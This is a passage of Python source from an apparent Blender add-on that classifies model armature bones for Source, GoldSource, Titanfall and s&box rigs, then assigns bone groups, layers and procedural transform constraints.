self.symmetrical_bones['legs'].setdefault('thighlow', [])
self.symmetrical_bones['legs']['thighlow'].append(bone)
self.symmetrical_bones['legs']['thighlow'].sort()
continue
elif bone.count('hip'):
self.symmetrical_bones['legs'].setdefault('hip', [])
self.symmetrical_bones['legs']['hip'].append(bone)
self.symmetrical_bones['legs']['hip'].sort()
continue
#Sbox
elif vatinfo.sbox:
arms = ['Clavicle', 'Arm_Upper', 'Arm_Lower', 'Hand']
legs = ['Leg_Upper', 'Leg_Lower', 'Ankle', 'Ball']
fingers = ['thumb_0', 'thumb_1', 'thumb_2', 'finger_index_0', 'finger_index_1', 'finger_index_2', 'finger_middle_0', 'finger_middle_1', 'finger_middle_2', 'finger_ring_0', 'finger_ring_1', 'finger_ring_2', None, None, None,]
if bone.title().count('Hold'):
self.other_bones['attachment'].append(bone)
self.other_bones['attachment'].sort()
continue
elif bone.count('finger_index_meta'):
self.symmetrical_bones['fingers'].setdefault('indexmeta', [])
self.symmetrical_bones['fingers']['indexmeta'].append(bone)
self.symmetrical_bones['fingers']['indexmeta'].sort()
continue
elif bone.count('finger_middle_meta'):
self.symmetrical_bones['fingers'].setdefault('middlemeta', [])
self.symmetrical_bones['fingers']['middlemeta'].append(bone)
self.symmetrical_bones['fingers']['middlemeta'].sort()
continue
elif bone.count('finger_ring_meta'):
self.symmetrical_bones['fingers'].setdefault('ringmeta', [])
self.symmetrical_bones['fingers']['ringmeta'].append(bone)
self.symmetrical_bones['fingers']['ringmeta'].sort()
continue
#Source
else:
arms = ['Clavicle', 'Upperarm', 'Forearm', 'Hand']
legs = ['Thigh', 'Calf', 'Foot', 'Toe0']
fingers = ['Finger0', 'Finger01', 'Finger02', 'Finger1', 'Finger11', 'Finger12', 'Finger2', 'Finger21', 'Finger22', 'Finger3', 'Finger31', 'Finger32', 'Finger4', 'Finger41', 'Finger42']
if bone.title().count('Forearm_Driven'):
self.helper_bones['viewmodel']['forearm_driven'].append(bone)
self.helper_bones['viewmodel']['forearm_driven'].sort()
continue
#Inversed due to how some armatures deal with bone names ('Arm, Arm1' for example)
if arms:
if arms[3]:
if bone.title().count(arms[3]):
self.symmetrical_bones['arms']['hand'].append(bone)
self.symmetrical_bones['arms']['hand'].sort()
continue
if arms[2]:
if bone.title().count(arms[2]):
self.symmetrical_bones['arms']['forearm'].append(bone)
self.symmetrical_bones['arms']['forearm'].sort()
continue
if arms[1]:
if bone.title().count(arms[1]):
self.symmetrical_bones['arms']['upperarm'].append(bone)
self.symmetrical_bones['arms']['upperarm'].sort()
continue
if arms[0]:
if bone.title().count(arms[0]):
self.symmetrical_bones['arms']['clavicle'].append(bone)
self.symmetrical_bones['arms']['clavicle'].sort()
continue
if legs:
if legs[3]:
if bone.title().count(legs[3]):
self.symmetrical_bones['legs']['toe0'].append(bone)
self.symmetrical_bones['legs']['toe0'].sort()
continue
if legs[2]:
if bone.title().count(legs[2]):
self.symmetrical_bones['legs']['foot'].append(bone)
self.symmetrical_bones['legs']['foot'].sort()
continue
if legs[1]:
if bone.title().count(legs[1]):
self.symmetrical_bones['legs']['calf'].append(bone)
self.symmetrical_bones['legs']['calf'].sort()
continue
if legs[0]:
if bone.title().count(legs[0]):
self.symmetrical_bones['legs']['thigh'].append(bone)
self.symmetrical_bones['legs']['thigh'].sort()
continue
if fingers:
if fingers[2]:
if bone.count(fingers[2]):
self.symmetrical_bones['fingers']['finger02'].append(bone)
self.symmetrical_bones['fingers']['finger02'].sort()
continue
if fingers[1]:
if bone.count(fingers[1]):
self.symmetrical_bones['fingers']['finger01'].append(bone)
self.symmetrical_bones['fingers']['finger01'].sort()
continue
if fingers[0]:
if bone.count(fingers[0]):
self.symmetrical_bones['fingers']['finger0'].append(bone)
self.symmetrical_bones['fingers']['finger0'].sort()
continue
if fingers[5]:
if bone.count(fingers[5]):
self.symmetrical_bones['fingers']['finger12'].append(bone)
self.symmetrical_bones['fingers']['finger12'].sort()
continue
if fingers[4]:
if bone.count(fingers[4]):
self.symmetrical_bones['fingers']['finger11'].append(bone)
self.symmetrical_bones['fingers']['finger11'].sort()
continue
if fingers[3]:
if bone.count(fingers[3]):
self.symmetrical_bones['fingers']['finger1'].append(bone)
self.symmetrical_bones['fingers']['finger1'].sort()
continue
if fingers[8]:
if bone.count(fingers[8]):
self.symmetrical_bones['fingers']['finger22'].append(bone)
self.symmetrical_bones['fingers']['finger22'].sort()
continue
if fingers[7]:
if bone.count(fingers[7]):
self.symmetrical_bones['fingers']['finger21'].append(bone)
self.symmetrical_bones['fingers']['finger21'].sort()
continue
if fingers[6]:
if bone.count(fingers[6]):
self.symmetrical_bones['fingers']['finger2'].append(bone)
self.symmetrical_bones['fingers']['finger2'].sort()
continue
if fingers[11]:
if bone.count(fingers[11]):
self.symmetrical_bones['fingers']['finger32'].append(bone)
self.symmetrical_bones['fingers']['finger32'].sort()
continue
if fingers[10]:
if bone.count(fingers[10]):
self.symmetrical_bones['fingers']['finger31'].append(bone)
self.symmetrical_bones['fingers']['finger31'].sort()
continue
if fingers[9]:
if bone.count(fingers[9]):
self.symmetrical_bones['fingers']['finger3'].append(bone)
self.symmetrical_bones['fingers']['finger3'].sort()
continue
if fingers[14]:
if bone.count(fingers[14]):
self.symmetrical_bones['fingers']['finger42'].append(bone)
self.symmetrical_bones['fingers']['finger42'].sort()
continue
if fingers[13]:
if bone.count(fingers[13]):
self.symmetrical_bones['fingers']['finger41'].append(bone)
self.symmetrical_bones['fingers']['finger41'].sort()
continue
if fingers[12]:
if bone.count(fingers[12]):
self.symmetrical_bones['fingers']['finger4'].append(bone)
self.symmetrical_bones['fingers']['finger4'].sort()
continue
custom_bones_raw.append(bone)
##Central bone##
if central_bones_raw:
#Bone list order:
#spines = pelvis, spine, spine1, spine2, spine3, spine4
#head = neck, head
for bone in central_bones_raw:
if vatinfo.special_viewmodel:
spines = [None, None, None, None, 'Spine_2', 'Spine_3']
head = []
elif vatinfo.goldsource:
spines = ['Pelvis', 'Spine', 'Spine1', 'Spine2', 'Spine3', 'Spine4']
head = ['Neck', 'Head']
elif vatinfo.titanfall:
spines = ['Hip', 'Spinea', 'Spineb', 'Spinec', None, None]
head = ['Neck', 'Head']
if bone.title().count('Neckb'):
self.central_bones.setdefault('neck2', [])
self.central_bones['neck2'].append(bone)
self.central_bones['neck2'].sort()
continue
elif vatinfo.sbox:
spines = ['Pelvis', 'Spine_0', 'Spine_1', 'Spine_2', None, None]
head = ['Neck_0', 'Head']
else:
spines = ['Pelvis', 'Spine', 'Spine1', 'Spine2', 'Spine3', 'Spine4']
head = ['Neck', 'Head']
if spines:
if spines[0]:
if bone.title().count(spines[0]):
self.central_bones['pelvis'].append(bone)
self.central_bones['pelvis'].sort()
continue
if spines[5]:
if bone.title().count(spines[5]):
self.central_bones['spine4'].append(bone)
self.central_bones['spine4'].sort()
continue
if spines[4]:
if bone.title().count(spines[4]):
self.central_bones['spine3'].append(bone)
self.central_bones['spine3'].sort()
continue
if spines[3]:
if bone.title().count(spines[3]):
self.central_bones['spine2'].append(bone)
self.central_bones['spine2'].sort()
continue
if spines[2]:
if bone.title().count(spines[2]):
self.central_bones['spine1'].append(bone)
self.central_bones['spine1'].sort()
continue
if spines[1]:
if bone.title().count(spines[1]):
self.central_bones['spine'].append(bone)
self.central_bones['spine'].sort()
continue
if head:
if head[1]:
if bone.title().count(head[1]):
self.central_bones['head'].append(bone)
self.central_bones['head'].sort()
continue
if head[0]:
if bone.title().count(head[0]):
self.central_bones['neck'].append(bone)
self.central_bones['neck'].sort()
continue
self.custom_bones.setdefault(bone.casefold(), [])
self.custom_bones[bone.casefold()].append(bone)
self.custom_bones[bone.casefold()].sort()
##Helper bones##
if helper_bones_raw:
for bone in helper_bones_raw:
#Bone list order:
#arms = Trapezius, Shoulder, Bicep, Elbow, Ulna, Wrist
#legs = Quadricep, Knee
#Additional bone set only in viewmodels that need a separate container to avoid messing with wrist generation
if vatinfo.viewmodel:
if bone.title().count('Ulna01'):
self.helper_bones['viewmodel']['ulna_extra1'].append(bone)
self.helper_bones['viewmodel']['ulna_extra1'].sort()
continue
elif bone.title().count('Ulna02'):
self.helper_bones['viewmodel']['ulna_extra2'].append(bone)
self.helper_bones['viewmodel']['ulna_extra2'].sort()
continue
elif bone.title().count('Wrist0'):
self.helper_bones['viewmodel']['wrist_extra'].append(bone)
self.helper_bones['viewmodel']['wrist_extra'].sort()
continue
elif bone.title().count('Wrist_Helper1'):
self.helper_bones['viewmodel']['wrist_helper1'].append(bone)
self.helper_bones['viewmodel']['wrist_helper1'].sort()
continue
elif bone.title().count('Wrist_Helper2'):
self.helper_bones['viewmodel']['wrist_helper2'].append(bone)
self.helper_bones['viewmodel']['wrist_helper2'].sort()
continue
elif bone.title().count('Thumbroot'):
self.helper_bones['viewmodel']['thumbroot'].append(bone)
self.helper_bones['viewmodel']['thumbroot'].sort()
continue
elif bone.title().count('Thumb_Fix'):
self.helper_bones['viewmodel']['thumbfix'].append(bone)
self.helper_bones['viewmodel']['thumbfix'].sort()
continue
if vatinfo.titanfall:
arms = [None, 'Shouldertwist', 'Shouldermid', 'Elbowb', None, 'Forearm']
legs = [None, 'Kneeb']
elif vatinfo.sbox:
arms = [None, None, 'Arm_Upper', 'Arm_Elbow_Helper', None, 'Arm_Lower']
legs = ['Leg_Upper', 'Leg_Knee_Helper']
if bone.title().count('Leg_Lower'):
self.helper_bones['legs'].setdefault('lowerleg', [])
self.helper_bones['legs']['lowerleg'].append(bone)
self.helper_bones['legs']['lowerleg'].sort()
continue
else:
arms = ['Trap', 'Shoulder', 'Bicep', 'Elbow', 'Ulna', 'Wrist']
legs = ['Quad', 'Knee']
#Louis exclusive helper bone
if bone.title().count('Shoulder1'):
self.helper_bones['arms'].setdefault('shoulder1', [])
self.helper_bones['arms']['shoulder1'].append(bone)
self.helper_bones['arms']['shoulder1'].sort()
continue
if arms[0]:
if bone.title().count(arms[0]):
self.helper_bones['arms']['trapezius'].append(bone)
self.helper_bones['arms']['trapezius'].sort()
continue
if arms[1]:
if bone.title().count(arms[1]):
self.helper_bones['arms']['shoulder'].append(bone)
self.helper_bones['arms']['shoulder'].sort()
continue
if arms[2]:
if bone.title().count(arms[2]):
self.helper_bones['arms']['bicep'].append(bone)
self.helper_bones['arms']['bicep'].sort()
continue
if arms[3]:
if bone.title().count(arms[3]):
self.helper_bones['arms']['elbow'].append(bone)
self.helper_bones['arms']['elbow'].sort()
continue
if arms[4]:
if bone.title().count(arms[4]):
self.helper_bones['arms']['ulna'].append(bone)
self.helper_bones['arms']['ulna'].sort()
continue
if arms[5]:
if bone.title().count(arms[5]):
self.helper_bones['arms']['wrist'].append(bone)
self.helper_bones['arms']['wrist'].sort()
continue
if legs[0]:
if bone.title().count(legs[0]):
self.helper_bones['legs']['quadricep'].append(bone)
self.helper_bones['legs']['quadricep'].sort()
continue
if legs[1]:
if bone.title().count(legs[1]):
self.helper_bones['legs']['knee'].append(bone)
self.helper_bones['legs']['knee'].sort()
continue
#Creates pairs for helper bones that aren't the conventional
prefix, bone2 = bone_convert(bone)
if bone2.title().startswith(self.side[0]):
self.helper_bones['others'].setdefault(bone2.title().replace(self.side[0], '').casefold(), [])
self.helper_bones['others'][bone2.title().replace(self.side[0], '').casefold()].append(bone)
self.helper_bones['others'][bone2.title().replace(self.side[0], '').casefold()].sort()
elif bone2.title().endswith(self.side[2]):
self.helper_bones['others'].setdefault(bone2.title().replace(self.side[2], '').casefold(), [])
self.helper_bones['others'][bone2.title().replace(self.side[2], '').casefold()].append(bone)
self.helper_bones['others'][bone2.title().replace(self.side[2], '').casefold()].sort()
elif bone2.title().startswith('Left_'):
self.helper_bones['others'].setdefault(bone.title().replace('Left_', '').casefold(), [])
self.helper_bones['others'][bone.title().replace('Left_', '').casefold()].append(bone)
self.helper_bones['others'][bone.title().replace('Left_', '').casefold()].sort()
elif bone2.title().endswith('_Left'):
self.helper_bones['others'].setdefault(bone.title().replace('_Left', '').casefold(), [])
self.helper_bones['others'][bone.title().replace('_Left', '').casefold()].append(bone)
self.helper_bones['others'][bone.title().replace('_Left', '').casefold()].sort()
elif bone2.title().startswith(self.side[1]):
self.helper_bones['others'].setdefault(bone2.title().replace(self.side[1], '').casefold(), [])
self.helper_bones['others'][bone2.title().replace(self.side[1], '').casefold()].append(bone)
self.helper_bones['others'][bone2.title().replace(self.side[1], '').casefold()].sort()
elif bone2.title().endswith(self.side[3]):
self.helper_bones['others'].setdefault(bone2.title().replace(self.side[3], '').casefold(), [])
self.helper_bones['others'][bone2.title().replace(self.side[3], '').casefold()].append(bone)
self.helper_bones['others'][bone2.title().replace(self.side[3], '').casefold().casefold()].sort()
elif bone2.title().startswith('Right_'):
self.helper_bones['others'].setdefault(bone.title().replace('Right_', '').casefold(), [])
self.helper_bones['others'][bone.title().replace('Right_', '').casefold()].append(bone)
self.helper_bones['others'][bone.title().replace('Right_', '').casefold()].sort()
elif bone2.title().endswith('_Right'):
self.helper_bones['others'].setdefault(bone.title().replace('_Right', '').casefold(), [])
self.helper_bones['others'][bone.title().replace('_Right', '').casefold()].append(bone)
self.helper_bones['others'][bone.title().replace('_Right', '').casefold()].sort()
else:
self.helper_bones['others']['others'].append(bone)
self.helper_bones['others']['others'].sort()
##Other bones##
if other_bones_raw:
for bone in other_bones_raw:
#Titanfall
if vatinfo.titanfall:
if bone.count('ja'):
self.other_bones['attachment'].append(bone)
self.other_bones['attachment'].sort()
elif bone.startswith('jx'):
self.other_bones['others'].append(bone)
self.other_bones['others'].sort()
else:
custom_bones_raw.append(bone)
elif vatinfo.sbox:
if bone.casefold().count('ik'):
self.other_bones.setdefault('ik', [])
self.other_bones['ik'].append(bone)
self.other_bones['ik'].sort()
else:
if bone.title().count('Forward'):
self.other_bones['forward'].append(bone)
self.other_bones['forward'].sort()
elif bone.title().count('Weapon') or bone.title().count('Muzzle') or bone.title().count('Shell'):
self.other_bones['weapon'].append(bone)
self.other_bones['weapon'].sort()
elif bone.startswith('a1.') or bone.startswith('a2.'):
self.other_bones['attachment'].append(bone)
self.other_bones['attachment'].sort()
elif bone.title().count('Bip01'):
self.central_bones['pelvis'].append(bone)
self.central_bones['pelvis'].sort()
elif bone.title().count('Camera'):
self.other_bones['viewmodel'].append(bone)
self.other_bones['viewmodel'].sort()
elif bone.title().count('Jiggle') or bone.title().count('Jiggy'):
self.custom_bones['jiggle'].append(bone)
self.custom_bones['jiggle'].sort()
else:
self.other_bones['others'].append(bone)
self.other_bones['others'].sort()
##Custom bones##
if custom_bones_raw:
for bone in custom_bones_raw:
if bone.title().count('Jiggle'):
self.custom_bones['jiggle'].append(bone)
self.custom_bones['jiggle'].sort()
elif bone.title().startswith(self.side[0]):
self.custom_bones.setdefault(bone.title().replace(self.side[0], '').casefold(), [])
self.custom_bones[bone.title().replace(self.side[0], '').casefold()].append(bone)
self.custom_bones[bone.title().replace(self.side[0], '').casefold()].sort()
elif bone.title().endswith(self.side[2]):
self.custom_bones.setdefault(bone.title().replace(self.side[2], '').casefold(), [])
self.custom_bones[bone.title().replace(self.side[2], '').casefold()].append(bone)
self.custom_bones[bone.title().replace(self.side[2], '').casefold()].sort()
elif bone.title().startswith('Left_'):
self.custom_bones.setdefault(bone.title().replace('Left_', '').casefold(), [])
self.custom_bones[bone.title().replace('Left_', '').casefold()].append(bone)
self.custom_bones[bone.title().replace('Left_', '').casefold()].sort()
elif bone.title().endswith('_Left'):
self.custom_bones.setdefault(bone.title().replace('_Left', '').casefold(), [])
self.custom_bones[bone.title().replace('_Left', '').casefold()].append(bone)
self.custom_bones[bone.title().replace('_Left', '').casefold()].sort()
elif bone.title().startswith(self.side[1]):
self.custom_bones.setdefault(bone.title().replace(self.side[1], '').casefold(), [])
self.custom_bones[bone.title().replace(self.side[1], '').casefold()].append(bone)
self.custom_bones[bone.title().replace(self.side[1], '').casefold()].sort()
elif bone.title().endswith(self.side[3]):
self.custom_bones.setdefault(bone.title().replace(self.side[3], '').casefold(), [])
self.custom_bones[bone.title().replace(self.side[3], '').casefold()].append(bone)
self.custom_bones[bone.title().replace(self.side[3], '').casefold()].sort()
elif bone.title().startswith('Right_'):
self.custom_bones.setdefault(bone.title().replace('Right_', '').casefold(), [])
self.custom_bones[bone.title().replace('Right_', '').casefold()].append(bone)
self.custom_bones[bone.title().replace('Right_', '').casefold()].sort()
elif bone.title().endswith('_Right'):
self.custom_bones.setdefault(bone.title().replace('_Right', '').casefold(), [])
self.custom_bones[bone.title().replace('_Right', '').casefold()].append(bone)
self.custom_bones[bone.title().replace('_Right', '').casefold()].sort()
else:
self.custom_bones['others'].append(bone)
self.custom_bones['others'].sort()
##Creates empty pairs for single bones##
for cat in self.symmetrical_bones.keys():
for container in self.symmetrical_bones[cat].keys():
if len(self.symmetrical_bones[cat][container]) == 1:
bone = self.symmetrical_bones[cat][container][0]
prefix, bone = bone_convert(bone)
if bone.title().startswith(self.side[0]) or bone.title().endswith(self.side[2]):
self.symmetrical_bones[cat][container].insert(1, None)
elif bone.title().startswith(self.side[1]) or bone.title().endswith(self.side[3]):
self.symmetrical_bones[cat][container].insert(0, None)
for cat in self.helper_bones.keys():
for container in self.helper_bones[cat].keys():
if len(self.helper_bones[cat][container]) == 1:
bone = self.helper_bones[cat][container][0]
prefix, bone = bone_convert(bone)
if bone.title().startswith(self.side[0]) or bone.title().endswith(self.side[2]):
self.helper_bones[cat][container].insert(1, None)
elif bone.title().startswith(self.side[1]) or bone.title().endswith(self.side[3]):
self.helper_bones[cat][container].insert(0, None)
else: #Nick left wrist fix
self.helper_bones[cat][container].insert(1, None)
if len(self.helper_bones['arms']['wrist']) == 2:
#Position fix for Nick's left wrist
if self.helper_bones['arms']['wrist'][1] == 'h2.wrist':
self.helper_bones['arms']['wrist'].sort(reverse=True)
for bone in self.full_bonelist:
bone = armature.pose.bones[bone]
if bone.bone.use_connect:
vatinfo.unconverted_armature = True
break
#Final bone report
if report:
print("Symmetrical bones:", list(self.symmetrical_bones.values()))
print("Central bones:", list(self.central_bones.values()))
print("Helper bones:", list(self.helper_bones.values()))
print("Other bones:", list(self.other_bones.values()))
print("Custom bones:", self.custom_bones)
else:
vatinfo.scheme = -1
#print(symmetrical_bones_raw)
#print(central_bones_raw)
#print(helper_bones_raw)
#print(other_bones_raw)
#print(custom_bones_raw)
##Relative unit##
def get_unit(self):
    """Compute and cache the relative unit for this armature.

    The unit is roughly "1 meter" expressed relative to the length of the
    armature's first pose bone, so later bone-placement tweaks stay
    consistent regardless of the scale the model was imported at.
    Stores the result in ``vatinfo.unit``; does nothing if already set.
    """
    vatinfo = bpy.context.scene.vatinfo
    # Already computed for this scene — keep the cached value.
    if vatinfo.unit:
        return
    # The first pose bone's length anchors the whole scale.
    reference_length = self.armature.pose.bones[0].length
    # Engine-specific calibration factors (empirically derived).
    if vatinfo.goldsource:
        scale_factor = 4.36085145847641
    elif vatinfo.sbox:
        scale_factor = 0.09201296705261927
    else:
        scale_factor = 5.356327005986801
    vatinfo.unit = reference_length*scale_factor
    print('Relative unit:', vatinfo.unit)
# Unit relative to the size it would be if imported from Blender Source Tools for Source armatures (For the sake of readability)
def get_armatures(self): #Gets generated armatures for selected armature
    """Look up previously generated companion armatures for the selected one.

    Searches ``bpy.data`` for objects/datablocks named after this armature
    with the ``.weight``, ``.anim_setup`` or ``.anim`` suffixes and records
    what was found on ``self`` and in the ``vatinfo`` scene flags.

    Fix: the original used bare ``except:`` clauses, which also swallow
    ``KeyboardInterrupt``/``SystemExit``; ``bpy.data`` collections raise
    ``KeyError`` for a missing name, so we catch exactly that.
    """
    vatinfo = bpy.context.scene.vatinfo
    def get_weight_armature():
        # A '<name>.weight' object marks a previously generated weight armature.
        try:
            self.weight_armature = bpy.data.objects[self.armature.name + '.weight']
            vatinfo.weight_armature = True
        except KeyError:
            vatinfo.weight_armature = False
        # Same check for the underlying armature datablock.
        try:
            self.weight_armature_real = bpy.data.armatures[self.armature_real.name + '.weight']
            vatinfo.weight_armature = True
        except KeyError:
            vatinfo.weight_armature = False
    def get_anim_armature():
        #Checks if it's a setup armature or a proper armature
        try:
            # Prefer the '.anim_setup' (in-progress) object; fall back to the
            # finished '.anim' object. If neither exists the KeyError escapes
            # to the outer handler below.
            try:
                self.animation_armature = bpy.data.objects[self.armature.name + '.anim_setup']
                vatinfo.animation_armature_setup = True
            except KeyError:
                self.animation_armature = bpy.data.objects[self.armature.name + '.anim']
                vatinfo.animation_armature_setup = False
            try:
                self.animation_armature_real = bpy.data.armatures[self.armature_real.name + '.anim_setup']
                vatinfo.animation_armature_setup = True
            except KeyError:
                self.animation_armature_real = bpy.data.armatures[self.armature_real.name + '.anim']
                vatinfo.animation_armature_setup = False
            vatinfo.animation_armature = True
        except KeyError:
            vatinfo.animation_armature = False
    get_weight_armature()
    get_anim_armature()
def get_constraints(self): #Gets previously added constraints that have not been removed
    """Detect leftover symmetry constraints on side-specific bones.

    Scans the symmetrical and helper bone maps; if a bone still carries a
    'Constraint Symmetry Location'/'Constraint Symmetry Rotation' constraint,
    sets ``vatinfo.symmetry`` to 1 (left-side prefix/suffix match) or 2
    (right-side match); a scanned bone with no such constraint resets it to 0
    via the loop's ``else`` clause. Once a nonzero value is found, further
    bones in each container are skipped.

    Fix: the original duplicated the entire scan for both bone maps; the
    logic is now in one nested helper applied to each map in turn.
    """
    vatinfo = bpy.context.scene.vatinfo
    armature = self.armature
    def scan(bone_categories):
        # bone_categories: dict of {category: {container: [bone names]}}.
        for cat in bone_categories.keys():
            for bones in bone_categories[cat].values():
                for bone in bones:
                    if bone:
                        if vatinfo.symmetry:
                            # Symmetry already detected — skip the rest of this container.
                            break
                        else:
                            prefix, name = bone_convert(bone)
                            if name.startswith(self.side[0]) or name.endswith(self.side[2]):
                                for constraint in armature.pose.bones[prefix + name].constraints:
                                    if constraint.name == 'Constraint Symmetry Location' or constraint.name == 'Constraint Symmetry Rotation':
                                        vatinfo.symmetry = 1
                                        break
                                else:
                                    # No symmetry constraint on this left-side bone.
                                    vatinfo.symmetry = 0
                            elif name.startswith(self.side[1]) or name.endswith(self.side[3]):
                                for constraint in armature.pose.bones[prefix + name].constraints:
                                    if constraint.name == 'Constraint Symmetry Location' or constraint.name == 'Constraint Symmetry Rotation':
                                        vatinfo.symmetry = 2
                                        break
                                else:
                                    # No symmetry constraint on this right-side bone.
                                    vatinfo.symmetry = 0
    scan(self.symmetrical_bones)
    scan(self.helper_bones)
def set_groups(self): #Organizes bones by bone group and bone layers
    """Assign every classified bone to a colored bone group and a bone layer.

    Group indices: 0 Center, 1 Left Arm, 2 Right Arm, 3 Left Leg,
    4 Right Leg, 5 Helpers, 6 Attachments, 7 Weapon, 8 Others, 9 Custom.
    Non-central bones are moved off layer 0 onto a per-category layer.
    """
    armature = self.armature
    #Checks if any groups exist already
    group = armature.pose.bone_groups.keys()
    if not group:
        #Creates groups and sets their color
        for group, color in zip(['Center', 'Left Arm', 'Right Arm', 'Left Leg', 'Right Leg', 'Helpers', 'Attachments', 'Weapon', 'Others', 'Custom'], ['THEME03', 'THEME01', 'THEME04', 'THEME01', 'THEME04', 'THEME09', 'THEME14', 'THEME07', 'THEME10', 'THEME06']):
            armature.pose.bone_groups.new(name=group)
            armature.pose.bone_groups[group].color_set = color
    for cat in self.symmetrical_bones.keys():
        #Arms and fingers
        if cat == 'arms' or cat == 'fingers':
            for bone in self.symmetrical_bones[cat].values():
                # index 0 = left-side bone, index 1 = right-side bone.
                for index, bone in enumerate(bone):
                    if bone:
                        prefix, bone = bone_convert(bone)
                        if index == 0:
                            armature.pose.bones[prefix + bone].bone_group_index = 1
                            armature.data.bones[prefix + bone].layers[1] = True
                        elif index == 1:
                            armature.pose.bones[prefix + bone].bone_group_index = 2
                            armature.data.bones[prefix + bone].layers[2] = True
                        # NOTE(review): indentation reconstructed — assumed the
                        # layer-0 hide applies to both sides; confirm upstream.
                        armature.data.bones[prefix + bone].layers[0] = False
        #Legs
        elif cat == 'legs':
            for bone in self.symmetrical_bones[cat].values():
                for index, bone in enumerate(bone):
                    if bone:
                        prefix, bone = bone_convert(bone)
                        if index == 0:
                            armature.pose.bones[prefix + bone].bone_group_index = 3
                            armature.data.bones[prefix + bone].layers[3] = True
                        elif index == 1:
                            armature.pose.bones[prefix + bone].bone_group_index = 4
                            armature.data.bones[prefix + bone].layers[4] = True
                        # NOTE(review): same reconstructed placement as the arms branch.
                        armature.data.bones[prefix + bone].layers[0] = False
    # Central bones stay on layer 0 (default layer untouched).
    for bone in self.central_bones.values():
        for bone in bone:
            if bone:
                prefix, bone = bone_convert(bone)
                armature.pose.bones[prefix + bone].bone_group_index = 0
    if self.helper_bones:
        for cat in self.helper_bones.keys():
            for bone in self.helper_bones[cat].values():
                for bone in bone:
                    if bone:
                        prefix, bone = bone_convert(bone)
                        armature.pose.bones[prefix + bone].bone_group_index = 5
                        armature.data.bones[prefix + bone].layers[5] = True
                        armature.data.bones[prefix + bone].layers[0] = False
    # Other bones: attachments, weapon bones, and everything else.
    for container, bone in self.other_bones.items():
        for bone in bone:
            if bone:
                prefix, bone = bone_convert(bone)
                if container == 'attachment':
                    armature.pose.bones[prefix + bone].bone_group_index = 6
                    armature.data.bones[prefix + bone].layers[6] = True
                    armature.data.bones[prefix + bone].layers[0] = False
                elif container == 'weapon':
                    armature.pose.bones[prefix + bone].bone_group_index = 7
                    armature.data.bones[prefix + bone].layers[7] = True
                    armature.data.bones[prefix + bone].layers[0] = False
                else:
                    armature.pose.bones[prefix + bone].bone_group_index = 8
                    armature.data.bones[prefix + bone].layers[8] = True
                    armature.data.bones[prefix + bone].layers[0] = False
    #Custom bones
    for bone in self.custom_bones.values():
        for bone in bone:
            if bone:
                prefix, bone = bone_convert(bone)
                armature.pose.bones[prefix + bone].bone_group_index = 9
                armature.data.bones[prefix + bone].layers[9] = True
                armature.data.bones[prefix + bone].layers[0] = False
    #Reveals used layers
    for i in [0,1,2,3,4,5,6,7,8, 9]:
        armature.data.layers[i] = True
    print("Bone groups set!")
def set_helper_bones(self):
    """Add 'Procedural Bone' TRANSFORM constraints to supported helper bones.

    For each helper bone in the driven containers (wrist, ulna, elbow, knee,
    quadricep, shoulder, thumbroot, forearm_driven) a rotation->rotation
    transform constraint is created (unless one named 'Procedural Bone'
    already exists), targeting the matching driver bone (hand, forearm,
    calf, thigh, upperarm or finger0) with per-container rotation ranges.
    """
    vatproperties = bpy.context.scene.vatproperties
    vatinfo = bpy.context.scene.vatinfo
    armature = self.armature
    # Tracks whether at least one new constraint was created this call.
    new = False
    for cat in self.helper_bones.keys():
        for container, bone in self.helper_bones[cat].items():
            # Only these containers get procedural drivers.
            if container == 'wrist' or container == 'ulna' or container == 'elbow' or container == 'knee' or container == 'quadricep' or container == 'shoulder' or container == 'thumbroot' or container == 'forearm_driven':
                # index 0 = left-side bone, index 1 = right-side bone.
                for index, bone in enumerate(bone):
                    if bone:
                        if index > 1:
                            # Only the first left/right pair is driven.
                            break
                        prefix, bone = bone_convert(bone)
                        #Adds transforms to only these helper bones unless already existing
                        try:
                            armature.pose.bones[prefix + bone].constraints['Procedural Bone']
                        except:
                            # Constraint missing (KeyError expected) — create and configure it.
                            transform = armature.pose.bones[prefix + bone].constraints.new('TRANSFORM')
                            new = True
                            #Initial parameters
                            transform.name = "Procedural Bone"
                            transform.target = self.armature
                            transform.map_from = 'ROTATION'
                            transform.map_to = 'ROTATION'
                            transform.target_space = 'LOCAL'
                            transform.owner_space = 'LOCAL'
                            #Hand rotation
                            if container == 'wrist' or container == 'ulna' or container == 'forearm_driven':
                                # Special viewmodels twist on Y instead of X.
                                if vatinfo.special_viewmodel:
                                    transform.from_min_y_rot = radians(-90)
                                    transform.from_max_y_rot = radians(90)
                                else:
                                    transform.from_min_x_rot = radians(-90)
                                    transform.from_max_x_rot = radians(90)
                                # Driver is the same-side hand bone.
                                prefix, bone = bone_convert(self.symmetrical_bones['arms']['hand'][index])
                                transform.subtarget = prefix + bone
                                if container == 'wrist':
                                    transform.to_min_x_rot = radians(-75)
                                    transform.to_max_x_rot = radians(75)
                                elif container == 'ulna':
                                    if vatinfo.special_viewmodel:
                                        transform.to_min_y_rot = radians(-50)
                                        transform.to_max_y_rot = radians(50)
                                    else:
                                        transform.to_min_x_rot = radians(-50)
                                        transform.to_max_x_rot = radians(50)
                                elif container == 'forearm_driven':
                                    transform.to_min_x_rot = radians(-25)
                                    transform.to_max_x_rot = radians(20)
                            #Forearm and thigh rotation
                            elif container == 'elbow' or container == 'knee' or container == 'quadricep':
                                # Titanfall elbows rotate about Y; everything else about Z.
                                if vatinfo.titanfall and container == 'elbow':
                                    transform.from_min_y_rot = radians(-90)
                                    transform.from_max_y_rot = radians(90)
                                    transform.to_min_y_rot = radians(-45)
                                    transform.to_max_y_rot = radians(45)
                                else:
                                    transform.from_min_z_rot = radians(-90)
                                    transform.from_max_z_rot = radians(90)
                                    transform.to_min_z_rot = radians(-45)
                                    transform.to_max_z_rot = radians(45)
                                if container == 'elbow':
                                    prefix, bone = bone_convert(self.symmetrical_bones['arms']['forearm'][index])
                                    transform.subtarget = prefix + bone
                                elif container == 'knee':
                                    prefix, bone = bone_convert(self.symmetrical_bones['legs']['calf'][index])
                                    transform.subtarget = prefix + bone
                                elif container == 'quadricep':
                                    # s&box rigs have no separate thigh driver here.
                                    if not vatinfo.sbox:
                                        prefix, bone = bone_convert(self.symmetrical_bones['legs']['thigh'][index])
                                        transform.subtarget = prefix + bone
                            elif container == 'shoulder':
                                #Not for Titanfall characters
                                if not vatinfo.titanfall:
                                    transform.from_min_y_rot = radians(-45)
                                    transform.from_max_y_rot = radians(45)
                                    #Nick exclusive (L4D2 'h2.wrist' helper): inverted, larger range.
